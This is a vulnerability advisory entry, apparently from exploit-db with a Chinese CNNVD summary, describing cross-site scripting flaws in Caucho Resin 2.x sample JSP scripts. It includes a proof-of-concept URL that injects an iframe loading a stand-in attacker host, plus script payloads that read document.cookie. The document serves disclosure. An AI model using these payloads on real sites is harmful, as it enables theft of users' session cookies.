https://www.exploit-db.com/exploits/23262
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-357

CauchoTechnologyResin2.0版本到2.1.2版本的示例脚本存在多个跨站脚本(XSS)漏洞。远程攻击者可以借助(1)env.jsp、(2)form.jsp、(3)session.jsp、（4）tictactoe.jsp的move参数或者guestbook.jsp的（5）名称或（6）注释栏来注入任意web脚本或HTML。

source: http://www.securityfocus.com/bid/8852/info

It has been reported that Caucho Resin is prone to multiple HTML Injection and cross-site scripting vulnerabilities in various scripts that may allow a remote attacker to cause hostile HTML or script code to be rendered in the browser of a user who follows a malicious link supplied by the attacker.

The affected scripts include env.jsp, form.jsp, session.jsp, and tictactoe.jsp. The 'name' and 'comment' fields of guestbook.jsp have been reported to be vulnerable to HTML injection. An attacker may exploit this vulnerability to execute arbitrary HTML and script code in the browser of an unsuspecting user. Exploitation may also allow attackers to inject hostile HTML and script code into the sample guestbook.

Successful exploitation of these issues may allow an attacker to steal cookie-based credentials. Other attacks may also be possible.

Caucho Resin version 2.1 and prior have been reported to be prone to this issue, however other versions may be affected as well.

http://www.example.com:8080/examples/tictactoe/tictactoe.jsp?move=<iframe%20src="http://attcker/evil.cgi"></iframe>4
or
<SCRIPT>alert(document.domain);</SCRIPT><SCRIPT>alert(document.cookie);</SCR

来源:XF
名称:resin-name-comment-xss(13460)
链接:http://xforce.iss.net/xforce/xfdb/13460
来源:BID
名称:8852
链接:http://www.securityfocus.com/bid/8852
来源:SECUNIA
名称:10031
链接:http://secunia.com/advisories/10031
来源:FULLDISC
名称:20031019CauchoResin2.x-CrossSiteScripting
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2003-October/012361.html